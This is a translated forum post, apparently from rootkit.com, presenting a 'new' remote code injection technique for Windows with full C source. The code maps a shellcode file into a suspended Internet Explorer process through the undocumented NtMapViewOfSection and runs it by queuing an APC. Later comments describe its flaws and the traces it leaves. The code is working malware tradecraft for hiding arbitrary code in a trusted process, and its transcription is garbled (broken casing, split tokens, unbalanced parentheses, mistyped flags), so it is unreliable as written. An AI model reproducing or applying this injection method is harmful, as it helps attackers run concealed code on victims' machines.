Translated by: zshoucheng
Original Source: http://www.rootkit.com/newsread.php?Newsid=715
New technology of remote code injection
By: yogle
I have developed a new way of executing code in remote processes: an undocumented function is used to write code into the remote process's address space, and a new technique is used to execute it there. This technique works entirely in user mode and requires no special conditions such as administrator privileges. Let the source code describe everything. (I apologise for my English; I am from Germany.)
Code:
# DEFINE _ win32_winnt 0x0400
# Include <windows. h>
// NTSTATUS as used by the native-API call below (the page's own typedef).
Typedef long ntstatus, * pntstatus;
// Success test: a non-negative NTSTATUS is a success code. As transcribed
// the parentheses are unbalanced; the intended form is ((ntstatus)(Status) >= 0).
# Define nt_success (Status) (ntstatus) (Status)> = 0)
// Inheritance disposition argument of NtMapViewOfSection; only viewshare is
// used on this page.
Typedef Enum _ section_inherit
...{
Viewshare = 1,
Viewunmap = 2
} Section_inherit;
// Signature of the undocumented ntdll export NtMapViewOfSection
// (section, process, base, zero bits, commit size, offset, view size,
// inherit, allocation type, page protection). It is not declared in any
// public header, so it is resolved at runtime in winmain.
Typedef ntstatus (_ stdcall * func_ntmapviewofsection) (handle, handle, lpvoid, ulong, size_t, large_integer *, size_t *, section_inherit, ulong, ulong );
// Filled in by getprocaddress in winmain; stays NULL if that lookup fails,
// and no caller on this page checks it before calling through it.
Func_ntmapviewofsection ntmapviewofsection = NULL;
// Maps a view of hfilemappingobject into the address space of hprocess (not
// the caller) via the ntmapviewofsection global. The parameter list mirrors
// MapViewOfFileEx with an extra leading target-process handle.
//   hprocess             - process that receives the view.
//   hfilemappingobject   - section (file mapping) handle to map.
//   dwdesiredaccess      - file_map_write / file_map_read / file_map_copy,
//                          translated below to a page protection; any other
//                          value maps the view page_noaccess. Note that no
//                          executable protection is ever requested here.
//   dwfileoffsethigh/low - 64-bit section offset, split as MapViewOfFileEx does.
//   dwnumberofbytestomap - requested view size; winmain passes 0 (presumably
//                          "whole section", but the kernel's interpretation is
//                          not shown on this page).
//   lpbaseaddress        - preferred base in the target, or NULL to let the
//                          system choose.
// Returns the view's base address inside hprocess, or NULL on any failure;
// the NTSTATUS is discarded, so callers get no error detail.
// ntmapviewofsection is not checked for NULL before the call.
// NOTE(review): viewsize is declared ulong, but the typedef'd prototype takes
// a size_t *; on builds where size_t is wider than ulong this passes a pointer
// to a too-small object. The two should be the same type.
Lpvoid ntapi mymapviewoffileex (handle hprocess, handle hfilemappingobject, DWORD dwdesiredaccess, DWORD dwfileoffsethigh, DWORD dwfileoffsetlow,
DWORD dwnumberofbytestomap, lpvoid lpbaseaddress)
...{
Ntstatus status;
Large_integer sectionoffset;
Ulong viewsize;
Ulong protect;
Lpvoid viewbase;
// Combine the two 32-bit halves into the 64-bit section offset.
Sectionoffset. lowpart = dwfileoffsetlow;
Sectionoffset. highpart = dwfileoffsethigh;
// Both are in/out parameters of the native call: the kernel may update them.
Viewbase = lpbaseaddress;
Viewsize = dwnumberofbytestomap;
// Translate the Win32 FILE_MAP_* access flags into a page protection.
// Checked in priority order write > read > copy; flags are not combined.
If (dwdesiredaccess & file_map_write)
...{
Protect = page_readwrite;
}
Else if (dwdesiredaccess & file_map_read)
...{
Protect = page_readonly;
}
Else if (dwdesiredaccess & file_map_copy)
...{
Protect = page_writecopy;
}
Else
...{
Protect = page_noaccess;
}
// Map the section view into the target process. Zero bits and commit size
// are both 0; viewshare is the inheritance disposition; allocation type 0.
Status = ntmapviewofsection (hfilemappingobject,
Hprocess,
& Viewbase,
0,
0,
& Sectionoffset,
& Viewsize,
Viewshare,
0,
Protect );
If (! Nt_success (Status ))
...{
// Failed: the status code is dropped here, so the caller only sees NULL.
Return NULL;
}
// Return the base address as chosen/confirmed by the kernel (may differ from lpbaseaddress).
Return viewbase;
}
// Entry point demonstrating the technique described above: the contents of a
// file are placed in a freshly created, still-suspended process by mapping a
// section view into it, and run by queuing a user-mode APC on that process's
// initial thread before it is resumed. From a defender's standpoint this
// sequence (child created suspended, cross-process section view mapped by
// the parent, APC queued to a thread that has not yet run) is the observable
// artefact of the technique. None of the API results below are checked, so
// every failure flows silently into the next call.
Int winapi winmain (hinstance, hinstance, lpstr, INT)
...{
// Resolve the undocumented export at runtime. Neither hdll nor the returned
// pointer is checked; a NULL result would be called through inside
// mymapviewoffileex.
Hmodule hdll = loadlibrary ("NTDLL. dll ");
Ntmapviewofsection = (func_ntmapviewofsection) getprocaddress (hdll, "ntmapviewofsection ");
// Open the payload file read-only and wrap it in a read-only section; the
// section, not a remote memory write, is what carries the bytes into the
// target. Invalid handles from either call are not detected.
Handle hfile = createfile ("C:/shellcode.txt", generic_read, 0, null, open_existing, file_attribute_normal, null );
Handle hmappedfile = createfilemapping (hfile, null, page_readonly, 0, 0, null );
// Create the target suspended so its initial thread has not executed yet.
// CreateProcess's return value is ignored; on failure PI keeps the zeroed
// (NULL) handles and every later call operates on them.
Startupinfo st;
Zeromemory (& St, sizeof (ST ));
St. cb = sizeof (startupinfo );
Process_information PI;
Zeromemory (& Pi, sizeof (PI ));
CreateProcess ("C:/programme/Internet Explorer/iexplore.exe", null, false, create_suincluded, null, null, & St, & PI );
// Map the section into the child. file_map_read becomes page_readonly inside
// mymapviewoffileex, so the view is never requested as executable; base NULL
// and size 0 leave both choices to the system. The result may be NULL and
// is not checked before use.
Lpvoid mappedfile = mymapviewoffileex (PI. hprocess, hmappedfile, file_map_read, 0, 0, 0, null );
// Queue a user-mode APC on the still-suspended initial thread, using the
// view base itself as the APC routine: the file must therefore begin with
// directly executable, position-independent code. When the APC is actually
// delivered relative to resumethread is not shown on this page.
Queueuserapc (papcfunc) mappedfile, Pi. hthread, null );
// Let the initial thread run.
Resumethread (PI. hthread );
// Release the parent's handles; nothing is unmapped or cleaned up explicitly.
Closehandle (hfile );
Closehandle (hmappedfile );
Closehandle (PI. hthread );
Closehandle (PI. hprocess );
Return 0;
}